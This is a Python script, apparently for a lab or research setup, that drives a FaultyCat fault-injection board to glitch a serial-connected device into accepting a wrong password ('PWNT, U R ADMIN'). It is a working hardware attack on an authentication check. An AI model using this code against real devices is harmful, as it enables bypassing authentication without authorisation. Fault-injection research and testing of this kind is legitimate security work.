| | import sys |
---|
| | import time |
---|
| | import pexpect # Required to handle screen sessions |
---|
| | import threading |
---|
| | from Modules import Worker |
---|
| | |
---|
| | DEFAULT_COMPORT = "/dev/ttyACM0" |
---|
| | SCREEN_NAME = "ttyUSB0_screen" # Replace this with the actual screen session name |
---|
| | |
---|
| | # Initialize the FaultyWorker |
---|
| | faulty_worker = Worker.FaultyWorker() |
---|
| | # Shared variable to store the response from the device |
---|
| | device_response = None |
---|
| | child = None # Global child variable |
---|
| | |
---|
| | def initialize_child(): |
---|
| | """Initialize the global child process for the screen session.""" |
---|
| | global child |
---|
| | child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8') |
---|
| | child.expect(pexpect.TIMEOUT, timeout=1) # Clear out any pre-existing buffer |
---|
| | |
---|
| | def send_test_message_and_read_response(): |
---|
| | """Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'.""" |
---|
| | global child |
---|
| | |
---|
| | # Send 'ping' to the screen session |
---|
| | child.sendline("ping") |
---|
| | sys.stdout.write("\rSent 'ping' to screen session.") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | # Wait a bit to ensure the command is processed |
---|
| | time.sleep(0.5) |
---|
| | |
---|
| | # Try reading any new output from the screen session |
---|
| | try: |
---|
| | response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data |
---|
| | if "pong" in response: |
---|
| | sys.stdout.write("\rReceived 'pong' response.") |
---|
| | return True |
---|
| | else: |
---|
| | sys.stdout.write(f"\rReceived unexpected response: {response}") |
---|
| | sys.stdout.flush() |
---|
| | except pexpect.exceptions.TIMEOUT: |
---|
| | sys.stdout.write("\rNo response received from the screen session (timeout).") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | return False |
---|
| | |
---|
| | def read_screen_output(): |
---|
| | """Read output from the screen session in a separate thread.""" |
---|
| | global device_response |
---|
| | buffer = "" # Initialize a buffer to store incoming characters |
---|
| | |
---|
| | try: |
---|
| | while True: |
---|
| | response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data |
---|
| | buffer += response # Append the new response to the buffer |
---|
| | |
---|
| | # Check if there's a complete line in the buffer |
---|
| | while "\n" in buffer: |
---|
| | line, buffer = buffer.split("\n", 1) # Split the buffer at the first newline |
---|
| | line = line.strip() # Remove any leading/trailing whitespace |
---|
| | |
---|
| | # Check for specific responses |
---|
| | if "incorrect!" in line: |
---|
| | #sys.stdout.write("\rReceived 'incorrect' response.") |
---|
| | device_response = 'incorrect' |
---|
| | return # Exit the loop on incorrect response |
---|
| | elif "correct" in line: |
---|
| | # Die here: Echo message, disarm device, and kill the program |
---|
| | sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | # Disarm the board |
---|
| | faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) |
---|
| | faulty_worker.board_uart.close() |
---|
| | |
---|
| | # Exit the program |
---|
| | sys.exit(0) |
---|
| | |
---|
| | else: |
---|
| | sys.stdout.write(f"\rReceived unexpected response: {line}") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | except pexpect.exceptions.TIMEOUT: |
---|
| | sys.stdout.write("\rNo response received from the screen session (timeout).") |
---|
| | sys.stdout.flush() |
---|
| | except Exception as e: |
---|
| | sys.stdout.write(f"\rError reading from screen session: {e}") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | def send_pulse_and_check_response(): |
---|
| | """Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel.""" |
---|
| | global device_response |
---|
| | try: |
---|
| | # Wait a bit to ensure the command is processed |
---|
| | |
---|
| | |
---|
| | # Send 'incorrectPassword' command to the screen session |
---|
| | sys.stdout.write("\rSending 'incorrectPassword' to screen session.") |
---|
| | sys.stdout.flush() |
---|
| | child.sendline("incorrectPassword") |
---|
| | |
---|
| | time.sleep(0.35) |
---|
| | |
---|
| | # Send 'pulse' command (simulating the pulse trigger) |
---|
| | faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8")) |
---|
| | sys.stdout.write("\rSent pulse...") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | # Start a thread to read the screen output |
---|
| | reader_thread = threading.Thread(target=read_screen_output) |
---|
| | reader_thread.start() |
---|
| | |
---|
| | # Wait for the reading thread to complete |
---|
| | reader_thread.join() |
---|
| | |
---|
| | except Exception as e: |
---|
| | sys.stdout.write(f"\rError interacting with screen session during pulse: {e}") |
---|
| | sys.stdout.flush() |
---|
| | return False |
---|
| | |
---|
| | def start_faulty_attack(): |
---|
| | """Send a pulse through the FaultyCat and listen for the response concurrently.""" |
---|
| | global child |
---|
| | try: |
---|
| | # Initialize the child process for screen session |
---|
| | initialize_child() |
---|
| | |
---|
| | # Open FaultyCat connection |
---|
| | faulty_worker.board_uart.open() |
---|
| | time.sleep(0.1) |
---|
| | sys.stdout.write("\rBoard connected.\n") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | # Arming the board |
---|
| | sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n") |
---|
| | sys.stdout.flush() |
---|
| | faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) |
---|
| | time.sleep(1) |
---|
| | faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8")) |
---|
| | |
---|
| | sys.stdout.write("\r[*] ARMED BOARD.\n") |
---|
| | sys.stdout.flush() |
---|
| | time.sleep(1) |
---|
| | |
---|
| | # Sending pulses and checking responses in a loop (up to 5 times) |
---|
| | max_iterations = 5 |
---|
| | for i in range(max_iterations): |
---|
| | sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n") |
---|
| | sys.stdout.flush() |
---|
| | |
---|
| | # Send the test message and check for pong |
---|
| | if send_test_message_and_read_response(): |
---|
| | |
---|
| | max_iterations_2 = 3 |
---|
| | for j in range(max_iterations_2): |
---|
| | # Send pulse and check for correct/incorrect response |
---|
| | if send_pulse_and_check_response(): |
---|
| | break # Break the loop if 'correct!' is received |
---|
| | |
---|
| | # Small delay before next iteration |
---|
| | time.sleep(1) |
---|
| | |
---|
| | # Disarm the board |
---|
| | sys.stdout.write("\rDISARMING BOARD. \n") |
---|
| | sys.stdout.flush() |
---|
| | faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8")) |
---|
| | faulty_worker.board_uart.close() |
---|
| | sys.stdout.write("\rBOARD DISARMED.\n") |
---|
| | sys.stdout.flush() |
---|
| | except Exception as e: |
---|
| | sys.stdout.write(f"\rError: {e}\n") |
---|
| | sys.stdout.flush() |
---|
| | finally: |
---|
| | # Make sure to clean up the child process |
---|
| | if child: |
---|
| | child.close() |
---|
| | |
---|
| | def faulty(): |
---|
| | """Configure and send pulses through the FaultyCat.""" |
---|
| | comport = DEFAULT_COMPORT |
---|
| | |
---|
| | print("Configuring the FaultyCat...") |
---|
| | print(f"Using serial port: {comport}") |
---|
| | |
---|
| | # Set the serial port |
---|
| | faulty_worker.set_serial_port(comport) |
---|
| | |
---|
| | # Validate the serial connection |
---|
| | if not faulty_worker.validate_serial_connection(): |
---|
| | print(f"Error: Could not establish connection on: {comport}") |
---|
| | return |
---|
| | |
---|
| | # Start the faulty attack (send pulse) |
---|
| | start_faulty_attack() |
---|
| | |
---|
| | if __name__ == "__main__": |
---|
| | print("Starting FaultyCat...") |
---|
| | faulty() |
---|
| | |
---|
| | |